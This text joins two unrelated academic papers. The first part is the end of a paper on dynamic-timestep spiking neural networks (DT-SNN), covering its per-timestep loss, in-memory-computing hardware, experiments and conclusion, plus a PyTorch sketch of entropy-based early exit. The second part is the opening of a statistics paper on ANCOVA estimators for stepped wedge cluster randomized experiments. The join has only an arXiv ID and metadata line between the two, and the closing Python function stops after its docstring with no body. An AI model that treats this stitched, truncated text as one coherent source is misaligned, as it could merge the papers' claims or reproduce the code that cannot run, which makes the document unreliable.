implicitly contributes to \(f_{T}(\mathbf{x})\), there lacks some explicit guidance to them. As shown in Fig. 2, the accuracy in the first timestep is always low. Here, we propose to explicitly add a loss function to each timestep output. The new loss function is defined as: \[\mathcal{L}(\mathbf{x},\mathbf{z})=-\frac{1}{TB}\sum_{t=1}^{T}\sum_{i=1}^{K}\mathbf{z}_{i }\log\pi(f_{t}(\mathbf{x})_{i}|\mathbf{x}), \tag{10}\] In practice, we find this loss function does not change much training time on GPUs. Also, we will demonstrate that adding this loss function can benefit the accuracy of the outputs from all timesteps, further improving our DT-SNN. Relation to Early Exit in ANNConceptually our DT-SNN is similar to the Early-Exit technique in ANN [18, 1] which adds multiple exits to different layers. 
Here, we want to clarify the relation between our DT-SNN and early exit: (1) DT-SNN operates in the time dimension, so it naturally fits SNNs and does not require any additional layers, while early exit has to add classifier layers in each branch; (2) DT-SNN has a higher potential than early exit: in the experiments section, we will show that the majority of the examples need only the first timestep, while the first exit in ANNs handles only a marginal fraction of examples. Furthermore, DT-SNN is fully complementary to the early exit, that is, we can further add the early exit technique to SNNs to achieve even higher efficiency. ### _Hardware Implementation_ We implement DT-SNN on a tiled-monolithic chip architecture [2] as shown in Fig. 3a. First, the individual layers of an SNN are mapped onto tiles. The number of tiles occupied by an SNN layer depends on factors such as the crossbar size, the number of input and output channels in a layer, kernel size, and the number of crossbars per tile. To implement DT-SNN-specific functionality, we incorporate the following modifications in conventionally used architectures: 1) A digital \(\sigma-E\) module to jointly compute the SoftMax (\(\sigma(\cdot)\)) and entropy (\(E\)) followed by threshold (\(\theta\)) comparison to detect whether to exit or not. 2) Timesteps are processed sequentially without pipelining. This eliminates the delay and hardware overhead (energy and area cost) required to empty the pipeline in case of dynamic timestep inference. Fig. 3: Figure showing (a) monolithic-tiled IMC architecture implementation of an SNN and (b) architecture of the \(\sigma-E\) module for softmax and entropy value computation. The tiles additionally contain global accumulators (GA) and global buffers (GB) for accumulating partial sums and storing the intermediate outputs, respectively, from different processing elements (PE). At the tile level, all modules are connected via a Network-on-Chip (NoC) interconnect. Each tile consists of several PEs, accumulators, and buffers. Each PE contains several crossbars, accumulators and buffers. The PEs and crossbars are connected by an H-Tree interconnect. We use a standard 2D-IMC crossbar connected to peripherals such as switch matrix, multiplexers, analog-to-digital converters (ADCs), and Shift-\(\&\)-Add circuits. The switch matrix provides input voltages at the source lines (SL) while simultaneously activating the word lines (WL). The voltages accumulate over the bit lines (BL). The analog MAC value (partial sum output) is converted to a digital value using the ADC. Multiplexers enable resource sharing of ADCs and Shift-\(\&\)-Add circuits among multiple crossbar columns to reduce the area overheads. The digital partial sum outputs from different crossbars, PEs and tiles are accumulated using the PE, tile, and global accumulators, respectively. For all layers except the last, the final MAC outputs from the GA are transferred to the LIF module for the non-linear activation functionality. The spike outputs are relayed to the tiles mapping the subsequent layers. For the last layer (a fully connected layer), the GA-accumulated MAC output is directed to the \(\sigma-E\) module as shown in Fig. 3a (using red arrows). Inside the \(\sigma-E\) module, MAC outputs are stored in the \(y\)-FIFO buffer. The depth of \(y\)-FIFO depends on the dataset. For example, in CIFAR10, the FIFO depth is 10. Data from the \(y\)-FIFO is passed to the address lines of the \(\sigma\)-LUT to compute \(\sigma\) values, which are pushed into the \(\sigma\)-FIFO.
The \(\sigma\)-FIFO outputs are sent as inputs to the Entropy Module that contains LUT for \(\log(\sigma)\) computation. The Entropy Module additionally contains a multiplier and accumulator circuit (comprised of an adder and register) to implement the entropy computation using Eq. (7). If the computed entropy is less than the threshold \(\theta\), the inference is terminated and new input data is loaded into the GB. DT-SNN is implemented on the IMC architecture using parameters shown in Table I. **Energy Consumption of the \(\sigma-E\) module:** Based on 32nm CMOS implementations, we find that the energy consumed by the \(\sigma-E\) module for one timestep is merely \(2e^{-5}\times\) of the 1 timestep inference energy consumed by the IMC architecture, which is negligible. ## IV Experimental Results In this section, we present the evaluation of both the task performance and the hardware performance of DT-SNN, highlighting its extreme efficacy and efficiency. ### _Comparison with Static SNN_ We select 4 popular visual benchmarks for evaluation, CIFAR-10 [9], CIFAR-100 [9], TinyImageNet [4], and CIFAR10-DVS [11] dataset. For the architecture, we choose to use VGG-16 [16] and ResNet-19 [7]. We compare our DT-SNN with the static SNN, _i.e.,_ an SNN that uses a fixed number of timesteps for all inputs. The training method for the static SNN and the DT-SNN are kept the same, except that the static SNN uses Eq. (9) as training loss while DT-SNN uses Eq. (10). We train them with a batch size of 256, a learning rate of 0.1 followed by a cosine decay. The L2 regularization is set to 0.0005. The number of timesteps is set to 4 as done in existing work [23]. For task metrics, we report the top-1 accuracy on the visual benchmarks. As for hardware metrics, we measure them based on the parameters shown in Table I and further normalize them w.r.t. static SNNs. We report the number of timesteps (\(T\)), energy, and energy-delay-product (EDP). Note that the cost of DT-SNN is varied across input data, thus we average the hardware metrics in the test dataset. #### Iv-A1 Comparison of Accuracy, Energy Cost, and \(T\) We summarize the results of 4 datasets in Table II. Here, we test static SNN with the full number of timesteps, _i.e.,_\(T=4\), and compare the hardware performances with DT-SNN under a similar accuracy level. We find that DT-SNN only needs 1.46 average timesteps on the CIFAR-10 dataset, bringing more than 50% energy saving. For the other three datasets, DT-SNN requires roughly half the number of timesteps used in a static SNN model. Nevertheless, DT-SNN reduces at least 40% of energy cost when compared to static SNN. Fig. 4: Comparison between static SNN and DT-SNN in terms of Energy-Delay-Product (EDP) (normalized to the static SNN). #### Vi-A2 Comparison of EDP We next compare the EDP between static SNNs and DT-SNNs. EDP is more suitable for measuring a holistic performance in hardware because it considers both time and energy efficiency. Fig. 4 shows the EDP comparison normalized by the EDP of the static SNN. We can find that DT-SNN is extremely efficient as it reduces 61.2%\(\sim\)80.9% EDP of static SNNs. These results highlight the efficiency brought by our method, leading to both energy cost and latency reduction. #### Vi-A3 Accuracy vs. EDP curve The static SNN can adjust the number of timesteps for all inputs to balance its accuracy and efficiency. Our DT-SNN can also adjust threshold \(\theta\) to balance such a trade-off. Here, we draw an accuracy-EDP curve in Fig. 5. 
_Note that here the EDP is normalized to the EDP of the 1-timestep static SNN._ We evaluate static SNN at 1,2,3, and 4 timesteps, and evaluate DT-SNN using three different thresholds. It can be seen that our DT-SNN is placed in the top-left corner, indicating a better accuracy-EDP trade-off than the static SNN. Remarkably, DT-SNN can bring significant improvement in low-timestep scenarios. For instance, DT-SNN VGG-16 increases the accuracy by 17% when compared to the 1-timestep static counterpart on the CIFAR-10 dataset, while it only has \(\sim\)10% higher EDP. In order to further visualize the dynamic timesteps in our method, Fig. 5 provides three pie charts in each case, which show the percentage of input examples that are inferred with 1, 2, 3, or 4 timesteps. Notably, \(T=1\) is usually the most selected case for the input due to the fact that most input examples can be correctly predicted using only 1 timestep. As the threshold decreases, more images start to use higher timesteps. Overall, we find \(T=3\) and \(T=4\) are rarely used in DT-SNN, demonstrating the effectiveness of our method to reduce redundant timesteps. #### Vi-A4 Comparison with Prior Work : Here, we also compare our method with prior work on SNNs. We compare tdBN [23] and Dspike [12] with our static-SNN and DT-SNN trained with Eq. (10). Fig. 6(A) shows the accuracy under different \(T\). Our DT-SNN reaches a new state of the art. #### Vi-A5 Non-Ideal Accuracy with Device Variations So far, all the experiments are performed without considering device conductance variation. In Fig. 6(B), we compare DT-SNN and static SNN under 20% device conductance variation. We simulate this by adding noise to the weights post-training. We see that DT-SNN still maintains higher accuracy while eliminating the redundant timesteps compared to static-SNN. ### _Acceleration in General Processors_ In the previous section, we demonstrated that our DT-SNN can accelerate the inference on an IMC architecture. Here, we show that apart from the IMC architecture we simulated, our method can also be applicable to other types of hardware like digital processors. To this end, we measure the inference throughput (_i.e.,_ the number of images inferred per second) on an RTX 2080Ti GPU simulated by PyTorch using batch size 1. Table III lists the accuracy, (averaged) timesteps, and throughput. As can be seen from the table, the throughput on GPU significantly reduces as the timesteps are increased. Fig. 5: Accuracy vs. EDP curve for both static SNN (drawn by pink line) and DT-SNN (drawn by blue line). For the static SNN, we report the accuracy and EDP when \(T=\{1,2,3,4\}\). For the DT-SNN, we draw the pie charts illustrating the distribution of \(\hat{T}(\mathbf{x})\). Fig. 6: Accuracy vs. the number of timesteps. (A) Comparison with prior works, (B) Comparison under non-ideal (NI) device variation in the IMC. Compared to static SNNs, our DT-SNN substantially improves the throughput while not sacrificing accuracy. For example, DT-SNN ResNet-19 with 1.07 averaged timesteps can infer 169.3 images per second, quite close to the 1-timestep static SNN (185.3 images per second), yet still bringing 3.4% accuracy improvement. ### _Ablation Study_ In this section, we ablate the training loss function choice. To verify this, we train static an SNN VGG-16 on CIFAR-10 either with Eq. (9) or Eq. (10) and test the corresponding accuracies of both static SNN and DT-SNN. Fig. 7 demonstrates the comparison between these two loss functions. 
We find that our training loss boosts the accuracy of all timesteps in the static SNN. In particular, the first timestep of VGG-16 changes from 76.3% to 91.5%. This result proves that explicit guidance from label annotations should be added to the lower timesteps. Meanwhile, it also increases the full timestep performance, resulting in a 0.6% accuracy increase on VGG-16. This improvement is extremely beneficial to DT-SNN. According to the pie charts describing the distribution of \(\hat{T}\), we find our training loss function enables a smaller number of timesteps to be required to classify the test data, thus reducing the EDP significantly. ### _Visualization_ In this section, we visualize the input images that are differentiated by our DT-SNN. Ideally, we anticipate DT-SNN can identify whether an image is easy or hard to infer (corresponding to 4 or 1 timestep). To maximize the differentiation, we use a low threshold to filter out the high timesteps, so that only the easiest images can be classified in the first timestep and vice versa. Fig. 8 presents the results on the TinyImageNet dataset. Generally, we find the images inferred with 1 timestep exhibit a simple structure: a clear object placed in the center of a clean background. In contrast, hard images require 4 timesteps and usually mix the background and the object together, making the object imperceptible. ## V Conclusion In this work, we introduce the Dynamic Timestep Spiking Neural Network, a simple yet significantly effective method that selects different timesteps for different input samples. DT-SNN determines the suitable timestep based on the confidence of the model output, seamlessly fitting the nature of sequential processing over time in SNNs. Moreover, DT-SNN is practical. It can be deployed to IMC architecture and even general digital processors. Extensive experiments prove that DT-SNN establishes a new state-of-the-art trade-off between hardware efficiency and task performance.
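As a companion to the method of Section III, the following is a minimal PyTorch-style sketch of the entropy-thresholded timestep rule in Eqs. (6)-(8). It assumes a hypothetical `model.step(x)` interface that advances the stateful spiking network by one timestep and returns the classifier output for that step, and it processes a single input sample; this interface and the placeholder threshold are our assumptions, not the authors' code.

```python
import math
import torch
import torch.nn.functional as F

@torch.no_grad()
def dt_snn_infer(model, x, max_T=4, theta=0.5):
    """Return (class probabilities, number of timesteps actually used)."""
    accum = 0.0
    for t in range(1, max_T + 1):
        accum = accum + model.step(x)          # running sum of per-timestep outputs
        probs = F.softmax(accum / t, dim=-1)   # Eq. (6), applied to the t-step average
        K = probs.shape[-1]
        # Eq. (7): normalized entropy in (0, 1]; clamp avoids log(0).
        entropy = -(probs * probs.clamp_min(1e-12).log()).sum(-1) / math.log(K)
        # Eq. (8): exit at the first timestep whose entropy falls below theta,
        # otherwise use the full budget max_T. (Assumes a batch of one sample.)
        if entropy.item() < theta or t == max_T:
            return probs, t
```

During training, the per-timestep loss of Eq. (10) supervises each partial average `accum / t`, which is what makes predictions taken at small `t` accurate enough for this early exit to be useful.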
2306.11267
Model-assisted analysis of covariance estimators for stepped wedge cluster randomized experiments
Stepped wedge cluster randomized experiments (SW-CREs) represent a class of unidirectional crossover designs. Although SW-CREs have become popular, definitions of estimands and robust methods to target estimands under the potential outcomes framework remain insufficient. To address this gap, we describe a class of estimands that explicitly acknowledge the multilevel data structure in SW-CREs and highlight three typical members of the estimand class that are interpretable. We then introduce four analysis of covariance (ANCOVA) working models to achieve estimand-aligned analyses with covariate adjustment. Each ANCOVA estimator is model-assisted, as its point estimator is consistent even when the working model is misspecified. Under the stepped wedge randomization scheme, we establish the finite population Central Limit Theorem for each estimator. We study the finite-sample operating characteristics of the ANCOVA estimators in simulations and illustrate their application by analyzing the Washington State Expedited Partner Therapy study.
Xinyuan Chen, Fan Li
2023-06-20T03:45:21Z
http://arxiv.org/abs/2306.11267v4
# Model-assisted analysis of covariance estimators for stepped wedge cluster randomized experiments ###### Abstract Stepped wedge cluster randomized experiments represent a class of unidirectional crossover designs that are increasingly adopted for comparative effectiveness and implementation science research. Although stepped wedge cluster randomized experiments have become popular, definitions of estimands and robust methods to target clearly-defined estimands remain insufficient. To address this gap, we describe a class of estimands that explicitly acknowledge the multilevel data structure in stepped wedge cluster randomized experiments, and highlight three typical members of the estimand class that are interpretable and are of practical interest. We then discuss four formulations of analysis of covariance (ANCOVA) working models to achieve estimand-aligned analyses. By exploiting baseline covariates, each ANCOVA model can potentially improve the estimation efficiency over the unadjusted estimators. In addition, each ANCOVA estimator is model-assisted in a sense that its point estimator is consistent to the target estimand even when the working model is misspecified. Under the stepped wedge randomization scheme, we establish the finite population Central Limit Theorem for each estimator, which motivates design-based variance estimators. Through simulations, we study the finite-sample operating characteristics of the ANCOVA estimators under different data generating processes. We illustrate their applications via the analysis of the Washington State Expedited Partner Therapy study. **Keywords:** causal inference, covariate adjustment, Central Limit Theorem, cluster randomized trials, design-based inference, estimands. ## 1 Introduction Stepped wedge cluster randomized experiments, or alternatively referred to as stepped wedge designs, are frequently used in assessing the causal effect of candidate treatments in public health, medicine and implementation science research, and are increasingly popular in pragmatic clinical trials. Under a stepped wedge design, all clusters are recruited at baseline and are placed under the usual care condition; the intervention will then be rolled out in a staggered fashion across the follow-up periods until all clusters are exposed under the intervention (Hussey and Hughes, 2007; Turner et al., 2017). In other words, each cluster will be randomized to a specific time point when the intervention starts to roll out, and can be mapped to a monotonic _treatment sequence_ over multiple periods. Compared to the conventional parallel-arm cluster randomized designs, stepped wedge designs are particularly attractive when concurrent implementation of the candidate treatment may incur substantial stress on administrative planning and logistical infrastructure, or when there is a desire to ensure complete rollout of the intervention in all clusters during the course of the study. Hemming and Taljaard (2020) provided four broad justifications on when stepped wedge designs are an appropriate design choice. Over the past decade, research on stepped wedge designs has placed much emphasis on trial planning to achieve sufficient statistical power with different intracluster correlation structures; a review of software for planning stepped wedge cluster randomized experiments can be found in Ouyang et al. (2022). 
Despite the efforts devoted to study planning, robust methods for analyzing stepped wedge cluster randomized experiments have received relatively little attention, with a few exceptions such as Thompson et al. (2018); Hughes et al. (2020); Kenny et al. (2022). Two main challenges remain not fully addressed by these previous studies. First, the typical analysis strategies include mixed-effects regression and generalized estimating equations with multilevel working correlation structures, but do not explicitly address whether the treatment effect estimates were intended to generalize to the expected value of outcomes when applied to new clusters or new patient populations. In parallel-arm cluster randomized experiments, the use of model-based methods has been shown to produce treatment effect estimates that are not always straightforward to interpret (Wang et al., 2022) when there is treatment effect heterogeneity according to cluster size. As the targets of inference, causal estimands are ideally defined at the outset to facilitate decision-making, and a clear description of estimands is vitally important for cluster randomized experiments (Kahan et al., 2022). Second, with clearly-defined target estimands, analytical methods should ideally be _model-assisted_ rather than model-based, in that the estimated treatment effects are unbiased for the specified estimands even if certain model assumptions fail to hold, and _efficient_, so that the uncertainty around the effect estimates is minimal to ensure a greater chance of identifying the treatment effect when it exists. As the number of available clusters is typically limited, methods with higher efficiency are critical for improving evidence generation through stepped wedge designs, and leveraging baseline covariates is a promising technique. However, recent methodological reviews (Li et al., 2021; Li and Wang, 2022) devoted to stepped wedge cluster randomized experiments showed that (1) model-based methods with parametric assumptions are prevalent, (2) estimands are not defined at the outset but rather considered as the regression coefficients of the treatment variable in mixed-effects models or the generalized estimating equations framework, and (3) few developments have considered incorporating baseline covariates. Therefore, the extent to which covariate adjustment can improve efficiency without compromising clearly-defined estimands in analyzing stepped wedge designs requires important clarification. In this article, we adopt a finite population perspective to define relevant causal estimands that acknowledge the multilevel data structure of a stepped wedge design, and to study robust regression-adjusted estimators for identifying these estimands. Our estimands generalize the counterparts in parallel-arm designs considered in Su and Ding (2021) and Kahan et al. (2022) to longitudinal cluster randomized designs. Apart from defining different versions of causal estimands, we also provide different formulations of analysis of covariance (ANCOVA) models that can enable model-assisted estimation. The ANCOVA working models differ with respect to considerations on period-specific covariate main effects and treatment-by-covariate interactions. We establish, for each ANCOVA estimator, the finite population Central Limit Theorem (Li and Ding, 2017), and motivate a design-based standard error estimator (Scott and Wu, 1981; Schochet et al., 2021) under the staggered rollout randomization scheme. 
We conduct simulation studies to evaluate the finite-sample properties of the proposed estimators and compare their performances in terms of estimation efficiency. Our simulation results substantiate the large-sample consistency and asymptotic normality of proposed estimators, and confirm that estimators adjusting for covariates lead to improved efficiency over the unadjusted estimators; however, the optimal estimator can depend on the data generating process. In addition, we also compare the performance of design-based standard error estimator with the conventional cluster-robust standard error (Liang and Zeger, 1986) through simulations to generate practical recommendations. Our work contributes to the burgeoning literature on design-based analysis of cluster randomized experiments. For parallel-arm cluster randomized designs, Imai et al. (2009) and Middleton and Aronow (2015) discussed nonparametric difference-in-means estimators for the average treatment effect, in the absence of covariates. Schochet et al. (2021) established the finite population Central Limit Theorem of an ANCOVA estimator applied to blocked cluster randomization, and compared the operating characteristics of the design-based standard error estimator and the cluster robust sandwich standard error estimator analytically and via simulations. Su and Ding (2021) extended their results to cluster randomized experiments and elucidated the efficiency implications due to covariate adjustment from ANCOVA estimators under parallel-arm randomization. Our work differs from these existing works due to the focus on stepped wedge cluster randomized experiments with staggered treatment rollout. Our work is also connected to the literature of design-based difference-in-difference estimators; see, for example Athey and Imbens (2022); Callaway and Sant'Anna (2021); de Chaisemartin and D'Haultfoeuille (2020); Roth and Sant'Anna (2021); Schochet (2022); Sun and Abraham (2021). However, these efforts were primarily focused on unit-level treatment assignment without the multilevel data structure, whereas we specifically focused on cluster-level randomization and individual-level data analysis. We also focused on establishing the finite population Central Limit Theorem under the Stable Unit Treatment Value Assumption (SUTVA) where there is a single version of intervention agnostic to the treatment duration (i.e. no learning effect or weakening effect over time if applied to the same unit). This is an assumption commonly invoked to analyze stepped wedge cluster randomized experiments in the literature and under this assumption, we seek to clarify appropriate causal estimands and survey a class of model-assisted analytical strategies. The rest of this article is structured as follows. Section 2 introduces the finite population causal inference framework and discusses causal estimands for stepped wedge cluster randomized experiments. Section 3 introduces four ANCOVA estimators and establishes their theoretical properties under finite population asymptotic regimes. Section 4 and 5 present results from our simulation study and the illustrative analysis of the Washington State Expedited Partner Therapy study. Section 6 concludes with a discussion and outlines directions for future research. ## 2 Notation and Estimands ### Assumptions for stepped wedge designs We consider the cross-sectional stepped wedge design (Copas et al., 2015), where different individuals are included in each cluster at the beginning of each distinct period. 
In a typical stepped wedge design, there are three experimental phases: the pre-rollout, where no clusters receive treatment (i.e., all clusters are placed under the control condition); the rollout, where clusters are randomized to different treatment schedules in a staggered fashion; and the post-rollout, where all clusters have received the treatment (Thompson et al., 2017). To formalize a standard stepped wedge design (standard in the sense that there is a single pre-rollout period and a single post-rollout period), we assume a study with \(I\) clusters (indexed by \(i\)) and \(J+2\) periods (indexed by \(j\)), where period \(0\) is the pre-rollout and period \(J+1\) is the post-rollout. We use \(Z_{ij}\in\{0,1\}\) to denote the treatment status indicator for cluster \(i\in\{1,\ldots,I\}\) in period \(j\in\{0,1,\ldots,J+1\}\), and the number of treated clusters in each rollout period \(j\), \(I_{j}\), is known and fixed for all \(j\). The rollout starts with \(I_{1}\) clusters randomized to treatment in period \(1\), and in period \(2\), the previously selected \(I_{1}\) clusters remain treated, while \(I_{2}-I_{1}\) out of the \(I-I_{1}\) untreated clusters are randomized to treatment, and so forth. This process ends with all clusters being eventually treated in period \(J+1\). It is immediate that \(Z_{i0}=0\) and \(Z_{i,J+1}=1\) by definition of the pre-rollout and post-rollout periods, and that \(0=I_{0}<I_{1}\leq I_{2}\leq\cdots\leq I_{J}<I_{J+1}=I\). This specific randomization design implies that elements of \(\mathbf{Z}_{i}=(Z_{i0},Z_{i1},\ldots,Z_{iJ},Z_{i,J+1})^{\prime}\) are correlated, with \(Z_{i0}=0\), \(Z_{i,J+1}=1\), and \(Z_{ij^{\prime}}=1\) if \(Z_{ij}=1\) for all \(j^{\prime}>j\). Additionally, it can be shown that the marginal distribution of the treatment variable across clusters in each period \(j\), \((Z_{1j},\ldots,Z_{Ij})\), follows a hypergeometric distribution with parameters \((I,I_{j})\). For individuals \(k=1,\ldots,N_{ij}\) in cluster-period \((i,j)\), we proceed to define the potential outcome. We let \(A_{i}=a\in\mathcal{A}=\{1,\ldots,J,J+1\}\) denote the period index such that cluster \(i\) first receives treatment (the so-called _treatment adoption time_), and therefore \(Z_{ij}=\mathbb{I}\{A_{i}\leq j\}\). Without any further assumptions, each individual has potential outcome \(Y_{ijk}^{A_{i},\mathbf{A}_{-i}}\) that depends not only on the adoption time for cluster \(i\) but also on those of other clusters (\(\mathbf{A}_{-i}\) is the vector of adoption times for all other clusters). We first impose a cluster-level SUTVA, formalized in Assumption 1. **Assumption 1** (Cluster-level SUTVA).: _Let \(Y_{ijk}^{A_{i},\mathbf{A}_{-i}}\) denote the potential outcome for an individual given the adoption time of all clusters, then \(Y_{ijk}^{A_{i},\mathbf{A}_{-i}}=Y_{ijk}^{A_{i},\mathbf{A}_{-i}^{*}}\), \(\forall\ \mathbf{A}_{-i}\neq\mathbf{A}_{-i}^{*}\)._ Assumption 1 implies that individual-level potential outcomes from cluster \(i\) in period \(j\) only depend on the specific treatment assignment of cluster \(i\) but not on assignments for other clusters. This is a conventional assumption made for cluster randomized experiments and is likely plausible if the clusters are not in close geographical proximity. It rules out interference between clusters and allows us to define the potential outcome \(Y_{ijk}^{A_{i}}\) without ambiguity. 
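To make the staggered assignment mechanism concrete, the following illustrative Python sketch (not part of the original article; the function name and input conventions are our own) draws adoption times uniformly at random subject to the prespecified treated-cluster counts \(I_{1}\leq\cdots\leq I_{J}\) and builds the implied treatment indicators \(Z_{ij}=\mathbb{I}\{A_{i}\leq j\}\).

```python
import numpy as np

def stepped_wedge_assignment(I, I_cum, seed=None):
    """Randomly assign treatment adoption times under a stepped wedge design.

    I     : number of clusters
    I_cum : [I_1, ..., I_J], cumulative numbers of treated clusters per rollout
            period (nondecreasing, with I_J < I)
    Returns (A, Z): adoption times A_i in {1, ..., J+1} and the I x (J+2)
    indicator matrix Z with Z[:, 0] = 0 (pre-rollout) and Z[:, J+1] = 1 (post-rollout).
    Illustrative sketch only, not code from the paper.
    """
    rng = np.random.default_rng(seed)
    J = len(I_cum)
    counts = np.diff([0] + list(I_cum) + [I])   # clusters newly treated in periods 1, ..., J+1
    A = rng.permutation(np.repeat(np.arange(1, J + 2), counts))
    periods = np.arange(J + 2)                  # periods 0 (pre-rollout) through J+1 (post-rollout)
    Z = (A[:, None] <= periods[None, :]).astype(int)
    return A, Z

# For example, I = 12 clusters and J = 3 rollout periods with I_1, I_2, I_3 = 3, 6, 9:
A, Z = stepped_wedge_assignment(I=12, I_cum=[3, 6, 9], seed=1)
```

Each draw yields exactly \(I_{j}\) treated clusters in rollout period \(j\), consistent with the design constraints described above.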
However, the notation \(Y_{ijk}^{A_{i}}\) implicitly assumes that the potential outcome can depend on the treatment adoption time and therefore the duration of the treatment. While this form is plausible in some settings where there is a learning effect due to delayed treatment implementation (Hughes et al., 2015; Kenny et al., 2022; Maleyeff et al., 2022), in this article, we consider the following assumption to further reduce the number of potential outcomes based on a dichotomy of treatment receipt. **Assumption 2** (Treatment duration irrelevance).: _There is only a single version of treatment across different periods such that variation in treatment duration is irrelevant to the potential outcomes. That is, for each \(k\in\{1,\ldots,N_{ij}\}\), (i) \(Y_{ijk}^{a}=Y_{ijk}^{a^{\prime}}=Y_{ijk}(1)\), if \(\max\{a,a^{\prime}\}\leq j\); (ii) \(Y_{ijk}^{a}=Y_{ijk}^{a^{\prime}}=Y_{ijk}(0)\), if \(\min\{a,a^{\prime}\}>j\); (iii) \(Y_{ijk}^{a}=Y_{ijk}(1)\), \(Y_{ijk}^{a^{\prime}}=Y_{ijk}(0)\), if \(a\leq j<a^{\prime}\), for \(a\), \(a^{\prime}\in\mathcal{A}\) and \(j\in\{0,1,\ldots,J,J+1\}\)._ Assumption 2 implies that individual-level potential outcomes from cluster \(i\) in period \(j\) only depend on the treatment received at that period, \(Z_{ij}\), such that we can write \(Y_{ijk}(Z_{ij})\) without ambiguity. Furthermore, Assumption 2 can be considered as a version of the _treatment-variation irrelevance_ assumption (VanderWeele, 2009) to rule out multiple versions of a treatment. To this extent, Assumptions 1 and 2 can be jointly considered as a generalized SUTVA applied to stepped wedge cluster randomized experiments. Indeed, treatment duration irrelevance has been conventionally assumed in the literature for stepped wedge designs (Li et al., 2021), even though rarely stated formally. It can also be considered as a multilevel extension of the _no anticipation_ and _invariance to history_ assumptions in the difference-in-differences literature (Athey and Imbens, 2022). Under Assumption 2, we can write the observed individual-level outcomes as \(Y_{ijk}=Z_{ij}Y_{ijk}(1)+(1-Z_{ij})Y_{ijk}(0)\) for each rollout period \(j\). In addition, the observed outcomes are \(Y_{i0k}=Y_{i0k}(0)\) and \(Y_{i,J+1,k}=Y_{i,J+1,k}(1)\) for all \(k\) by definition of the pre-rollout and post-rollout periods. To complete the data specification, we assume the cluster-period size \(N_{ij}\) to be unaffected by treatment assignment, thereby ruling out post-randomization selection bias (Li et al., 2022). We write the number of individuals in cluster \(i\) as \(N_{i}=\sum_{j=1}^{J}N_{ij}\), the number of individuals in period \(j\) as \(N_{j}=\sum_{i=1}^{I}N_{ij}\), and the total number of individuals across clusters and periods as \(N=\sum_{i=1}^{I}\sum_{j=1}^{J}N_{ij}\). We further denote \(\mathbf{Q}_{ijk}\) as the vector of individual-level baseline covariates recorded during recruitment (assumed exogenous and not affected by assignment), and \(\mathbf{C}_{ij}\) as the vector of cluster-level characteristics (which can depend on period), possibly including cluster-level summaries such as \(\overline{\mathbf{Q}}_{ij}=N_{ij}^{-1}\sum_{k=1}^{N_{ij}}\mathbf{Q}_{ijk}\), the summary of the pre-rollout outcomes \(\overline{Y}_{i0}=N_{i0}^{-1}\sum_{k=1}^{N_{i0}}Y_{i0k}\), and the cluster-period size \(N_{ij}\). The collection of covariates not affected by treatment assignment for each individual can then be defined as \(\mathbf{X}_{ijk}=\mathbf{Q}_{ijk}\cup\mathbf{C}_{ij}\). 
The observed data for each cluster-period, therefore, is \(\{(Y_{ijk},Z_{ij},\mathbf{X}_{ijk}),k=1,\ldots,N_{ij}\}\). Finally, we assume the following. **Assumption 3** (Stepped wedge randomization).: _Write \(\mathcal{Y}\) and \(\mathcal{X}\) as the collection of all potential outcomes and covariates across individuals and cluster-periods, then_ \[P(\mathbf{Z}_{i}=\mathbf{z}|\mathcal{Y},\mathcal{X})=\binom{I}{I_{1},I_{2}-I_{1}, \ldots,I_{J+1}-I_{J}}^{-1},\] _where \(Z_{i0}=0\) and \(Z_{i,J+1}=1\) almost surely._ Assumption 3 defines the rollout schedule and states the source of randomness in the observed outcome. Importantly, we write \(e_{j}=I_{j}/I\) as the cluster-level propensity score fixed by design, and naturally have \(0=e_{0}<e_{1}\leq e_{2}\leq\cdots\leq e_{J}<e_{J+1}=1\). The cluster-level propensity scores \(e_{0}=0\) and \(e_{J+1}=1\) violate the _positivity_ assumption (Imbens and Rubin, 2015); this is a consequence of the particular study design, and because there is no possibility for individuals during these two periods (the pre-rollout and post-rollout periods) to receive the unobserved counterfactual treatment assignment, we set \(Y_{i0k}(1)=\star\) and \(Y_{i,J+1,k}(0)=\star\), and only formulate estimands based on the rollout periods. The idea of treating potential outcomes that have no possibility of being observed as undefined values is reminiscent of the _truncation-by-death_ problem (Zhang et al., 2009), and one can consider that \(\{Y_{i0k}(1),Y_{i,J+1,k}(0)\}\) are truncated by the study design. We do acknowledge, however, that it might be possible to leverage additional assumptions to extrapolate \(\{Y_{i0k}(1),Y_{i,J+1,k}(0)\}\) from the observed data; we do not pursue this idea here but provide a discussion on this point in Section 6. ### Causal estimands We consider a finite population framework where all potential outcomes are fixed, and variability is solely driven by the randomization distribution. Under Assumptions 1 and 2, we are interested in the following class of weighted average treatment effect (WATE) estimands during the rollout periods, defined as \[\tau^{w}=\sum_{j=1}^{J}\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left[\frac{\sum_{i=1 }^{I}w_{ij}\left\{\overline{Y}_{ij}(1)-\overline{Y}_{ij}(0)\right\}}{\sum_{i=1 }^{I}w_{ij}}\right]=\overline{Y}(1)-\overline{Y}(0), \tag{1}\] where the weighted cluster-period mean potential outcome is \[\overline{Y}_{ij}(z)=\frac{\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}(z)}{\sum_{k=1}^{N _{ij}}w_{ijk}},\ \text{for}\ z\in\{0,1\},\] with individual-specific weight \(w_{ijk}\geq 0\), cluster-period total weight, \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}\), and period total weight, \(w_{j}=\sum_{i=1}^{I}w_{ij}\). This estimand has also been considered by Schochet et al. (2021) in blocked cluster randomized controlled experiments, and a subtle conceptual difference is that we have excluded the pre-rollout and post-rollout periods due to lack of positivity. Furthermore, we can write the weighted average treatment effect of period \(j\) as \[\tau_{j}^{w}=\frac{\sum_{i=1}^{I}w_{ij}\left\{\overline{Y}_{ij}(1)-\overline{Y }_{ij}(0)\right\}}{\sum_{i=1}^{I}w_{ij}}=\overline{Y}_{j}(1)-\overline{Y}_{j}( 0).\] This quantity is a building block of (1), and is essentially a weighted average treatment effect in the spirit of Su and Ding (2021) for a parallel-arm cluster randomized experiment with a single period. 
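As an illustration of the estimand family (1), the short Python sketch below (not from the article; the nested-list data layout and function name are hypothetical) evaluates \(\tau_{j}^{w}\) and \(\tau^{w}\) from a complete set of potential outcomes and user-supplied individual weights \(w_{ijk}\); in an actual trial only one potential outcome per individual is observed, so such a computation is only possible within simulations.

```python
import numpy as np

def wate(Y1, Y0, w):
    """Evaluate tau_j^w and tau^w in (1) from full potential outcomes.

    Y1[i][j], Y0[i][j], w[i][j] : arrays of Y_ijk(1), Y_ijk(0), and w_ijk for
    cluster i in rollout period j (rollout periods only). Illustrative sketch.
    """
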